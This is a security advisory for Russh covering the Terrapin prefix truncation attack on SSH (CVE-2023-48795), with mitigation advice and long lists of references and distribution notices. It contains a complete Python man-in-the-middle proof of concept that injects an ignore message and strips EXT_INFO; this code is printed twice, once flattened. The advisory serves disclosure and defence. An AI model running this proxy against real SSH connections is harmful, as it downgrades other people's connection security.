Headline
GHSA-45x7-px36-x8w8: Russh vulnerable to Prefix Truncation Attack against ChaCha20-Poly1305 and Encrypt-then-MAC
Summary
Russh v0.40.1 and earlier is vulnerable to a novel prefix truncation attack (a.k.a. Terrapin attack), which allows a man-in-the-middle attacker to strip an arbitrary number of messages right after the initial key exchange, breaking SSH extension negotiation (RFC8308) in the process and thus downgrading connection security.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called “strict kex” which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes. Support for strict key exchange has been added to Russh in the patched version.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 ([email protected]) and Encrypt-then-MAC (*[email protected] MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message’s sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details and a pre-print of the associated research paper, see https://terrapin-attack.com. This website is not affiliated with Russh in any way.
PoC
<details> <summary>Extension Negotiation Downgrade Attack ([email protected])</summary>
#!/usr/bin/python3
import socket
from binascii import unhexlify
from threading import Thread
from time import sleep
#####################################################################################
## Proof of Concept for the extension downgrade attack ##
## ##
## Variant: ChaCha20-Poly1305 ##
## ##
## Client(s) tested: OpenSSH 9.5p1 / PuTTY 0.79 ##
## Server(s) tested: OpenSSH 9.5p1 ##
## ##
## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##
#####################################################################################
# IP and port for the TCP proxy to bind to
PROXY_IP = '127.0.0.1'
PROXY_PORT = 2222
# IP and port of the server
SERVER_IP = '127.0.0.1'
SERVER_PORT = 22
LENGTH_FIELD_LENGTH = 4
def pipe_socket_stream(in_socket, out_socket):
try:
while True:
data = in_socket.recv(4096)
if len(data) == 0:
break
out_socket.send(data)
except ConnectionResetError:
print("[!] Socket connection has been reset. Closing sockets.")
except OSError:
print("[!] Sockets closed by another thread. Terminating pipe_socket_stream thread.")
in_socket.close()
out_socket.close()
rogue_msg_ignore = unhexlify('0000000C060200000000000000000000')
def perform_attack(client_socket, server_socket):
# Version exchange
client_vex = client_socket.recv(255)
server_vex = server_socket.recv(255)
client_socket.send(server_vex)
server_socket.send(client_vex)
# SSH_MSG_KEXINIT
client_kexinit = client_socket.recv(35000)
server_kexinit = server_socket.recv(35000)
client_socket.send(server_kexinit)
server_socket.send(client_kexinit)
# Client will now send the key exchange INIT
client_kex_init = client_socket.recv(35000)
server_socket.send(client_kex_init)
# Insert ignore message (to client)
client_socket.send(rogue_msg_ignore)
# Wait half a second here to avoid missing EXT_INFO
# Can be solved by counting bytes as well
sleep(0.5)
# KEX_REPLY / NEW_KEYS / EXT_INFO
server_response = server_socket.recv(35000)
# Strip EXT_INFO before forwarding server_response to client
# Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
server_newkeys_start = server_kex_reply_length
server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH])
server_extinfo_start = server_newkeys_start + server_newkeys_length
client_socket.send(server_response[:server_extinfo_start])
if __name__ == '__main__':
print("--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---")
mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mitm_socket.bind((PROXY_IP, PROXY_PORT))
mitm_socket.listen(5)
print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...")
try:
while True:
client_socket, client_addr = mitm_socket.accept()
print(f"[+] Accepted connection from: {client_addr}")
print(f"[+] Establishing new target connection to {(SERVER_IP, SERVER_PORT)}.")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.connect((SERVER_IP, SERVER_PORT))
print("[+] Performing extension downgrade")
perform_attack(client_socket, server_socket)
print("[+] Downgrade performed. Spawning new forwarding threads to handle client connection from now on.")
forward_client_to_server_thread = Thread(target=pipe_socket_stream, args=(client_socket, server_socket), daemon=True)
forward_client_to_server_thread.start()
forward_server_to_client_thread = Thread(target=pipe_socket_stream, args=(server_socket, client_socket), daemon=True)
forward_server_to_client_thread.start()
except KeyboardInterrupt:
client_socket.close()
server_socket.close()
mitm_socket.close()
</details>
Impact
This attack targets the specification of ChaCha20-Poly1305 ([email protected]) and Encrypt-then-MAC (*[email protected]), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
Summary
Russh v0.40.1 and earlier is vulnerable to a novel prefix truncation attack (a.k.a. Terrapin attack), which allows a man-in-the-middle attacker to strip an arbitrary number of messages right after the initial key exchange, breaking SSH extension negotiation (RFC8308) in the process and thus downgrading connection security.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called “strict kex” which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes. Support for strict key exchange has been added to Russh in the patched version.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 ([email protected]) and Encrypt-then-MAC (*[email protected] MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message’s sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details and a pre-print of the associated research paper, see https://terrapin-attack.com. This website is not affiliated with Russh in any way.
PoCExtension Negotiation Downgrade Attack ([email protected])
#!/usr/bin/python3 import socket from binascii import unhexlify from threading import Thread from time import sleep
##################################################################################### ## Proof of Concept for the extension downgrade attack ## ## ## ## Variant: ChaCha20-Poly1305 ## ## ## ## Client(s) tested: OpenSSH 9.5p1 / PuTTY 0.79 ## ## Server(s) tested: OpenSSH 9.5p1 ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## #####################################################################################
# IP and port for the TCP proxy to bind to PROXY_IP = ‘127.0.0.1’ PROXY_PORT = 2222
# IP and port of the server SERVER_IP = ‘127.0.0.1’ SERVER_PORT = 22
LENGTH_FIELD_LENGTH = 4
def pipe_socket_stream(in_socket, out_socket): try: while True: data = in_socket.recv(4096) if len(data) == 0: break out_socket.send(data) except ConnectionResetError: print("[!] Socket connection has been reset. Closing sockets.") except OSError: print("[!] Sockets closed by another thread. Terminating pipe_socket_stream thread.") in_socket.close() out_socket.close()
rogue_msg_ignore = unhexlify(‘0000000C060200000000000000000000’) def perform_attack(client_socket, server_socket): # Version exchange client_vex = client_socket.recv(255) server_vex = server_socket.recv(255) client_socket.send(server_vex) server_socket.send(client_vex) # SSH_MSG_KEXINIT client_kexinit = client_socket.recv(35000) server_kexinit = server_socket.recv(35000) client_socket.send(server_kexinit) server_socket.send(client_kexinit) # Client will now send the key exchange INIT client_kex_init = client_socket.recv(35000) server_socket.send(client_kex_init) # Insert ignore message (to client) client_socket.send(rogue_msg_ignore) # Wait half a second here to avoid missing EXT_INFO # Can be solved by counting bytes as well sleep(0.5) # KEX_REPLY / NEW_KEYS / EXT_INFO server_response = server_socket.recv(35000) # Strip EXT_INFO before forwarding server_response to client # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH]) server_newkeys_start = server_kex_reply_length server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH]) server_extinfo_start = server_newkeys_start + server_newkeys_length client_socket.send(server_response[:server_extinfo_start])
if __name__ == '__main__’: print(“— Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) —”) mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5)
print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections…") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new target connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Performing extension downgrade") perform_attack(client_socket, server_socket) print("[+] Downgrade performed. Spawning new forwarding threads to handle client connection from now on.") forward_client_to_server_thread = Thread(target=pipe_socket_stream, args=(client_socket, server_socket), daemon=True) forward_client_to_server_thread.start() forward_server_to_client_thread = Thread(target=pipe_socket_stream, args=(server_socket, client_socket), daemon=True) forward_server_to_client_thread.start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close()
Impact
This attack targets the specification of ChaCha20-Poly1305 ([email protected]) and Encrypt-then-MAC (*[email protected]), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
References
- GHSA-45x7-px36-x8w8
- https://nvd.nist.gov/vuln/detail/CVE-2023-48795
- paramiko/paramiko#2337
- TeraTermProject/teraterm@7279fbd
- golang/crypto@9d2ee97
- warp-tech/russh@1aa340a
- https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42
- https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25
- https://github.com/openssh/openssh-portable/commits/master
- https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst
- https://github.com/ronf/asyncssh/tags
- https://github.com/warp-tech/russh/releases/tag/v0.40.2
- https://gitlab.com/libssh/libssh-mirror/-/tags
- https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ
- https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg
- https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/
- https://matt.ucc.asn.au/dropbear/CHANGES
- https://news.ycombinator.com/item?id=38684904
- https://news.ycombinator.com/item?id=38685286
- https://thorntech.com/cve-2023-48795-and-sftp-gateway/
- https://twitter.com/TrueSkrillor/status/1736774389725565005
- https://www.bitvise.com/ssh-server-version-history
- https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
- https://www.openssh.com/openbsd.html
- https://www.openssh.com/txt/release-9.6
- https://www.openwall.com/lists/oss-security/2023/12/18/2
- https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/
- https://www.terrapin-attack.com
- http://www.openwall.com/lists/oss-security/2023/12/18/3
Related news
Debian Linux Security Advisory 5750-1 - Support for the "strict kex" SSH extension has been backported to AsyncSSH (a Python implementation of the SSHv2 protocol) as hardening against the Terrapin attack.
Red Hat Security Advisory 2024-3918-03 - Red Hat OpenShift Container Platform release 4.14.30 is now available with updates to packages and images that fix several bugs and add enhancements.
Ubuntu Security Notice 6738-1 - Fabian Bäumer, Marcus Brinkmann, and Joerg Schwenk discovered that LXD incorrectly handled the handshake phase and the use of sequence numbers in SSH Binary Packet Protocol. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to bypass integrity checks.
Red Hat Security Advisory 2024-1197-03 - A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4.
Red Hat Security Advisory 2024-1194-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 8.0. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include denial of service and file overwrite vulnerabilities.
Red Hat Security Advisory 2024-0766-03 - Red Hat OpenShift Container Platform release 4.15.0 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-0880-03 - Red Hat OpenShift Serverless 1.31.1 is now available. Issues addressed include denial of service and traversal vulnerabilities.
Red Hat Security Advisory 2024-0789-03 - An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available. Issues addressed include buffer overflow and denial of service vulnerabilities.
Red Hat Security Advisory 2024-0628-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.
Red Hat Security Advisory 2024-0538-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include bypass and null pointer vulnerabilities.
Ubuntu Security Notice 6598-1 - Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue.
Ubuntu Security Notice 6589-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol used in FileZilla is prone to a prefix truncation attack, known as the "Terrapin attack". A remote attacker could use this issue to downgrade or disable some security features and obtain sensitive information.
Ubuntu Security Notice 6585-1 - Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue.
Debian Linux Security Advisory 5601-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.
Debian Linux Security Advisory 5600-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.
Debian Linux Security Advisory 5599-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.
Ubuntu Security Notice 6560-2 - USN-6560-1 fixed several vulnerabilities in OpenSSH. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue.
Security researchers from Ruhr University Bochum have discovered a vulnerability in the Secure Shell (SSH) cryptographic network protocol that could allow an attacker to downgrade the connection's security by breaking the integrity of the secure channel. Called Terrapin (CVE-2023-48795, CVSS score: 5.9), the exploit has been described as the "first ever practically exploitable prefix
Debian Linux Security Advisory 5591-1 - Several vulnerabilities were discovered in libssh, a tiny C SSH library.
Gentoo Linux Security Advisory 202312-16 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution. Versions greater than or equal to 0.10.6 are affected.
Gentoo Linux Security Advisory 202312-17 - Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution. Versions greater than or equal to 9.6_p1 are affected.
Debian Linux Security Advisory 5588-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol is prone to a prefix truncation attack, known as the "Terrapin attack". This attack allows a MITM attacker to effect a limited break of the integrity of the early encrypted SSH transport protocol by sending extra messages prior to the commencement of encryption, and deleting an equal number of consecutive messages immediately after encryption starts.
Debian Linux Security Advisory 5586-1 - Several vulnerabilities have been discovered in OpenSSH, an implementation of the SSH protocol suite.
Ubuntu Security Notice 6561-1 - Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue.
Ubuntu Security Notice 6560-1 - Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue. Luci Stanescu discovered that OpenSSH incorrectly added destination constraints when smartcard keys were added to ssh-agent, contrary to expectations. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 23.04.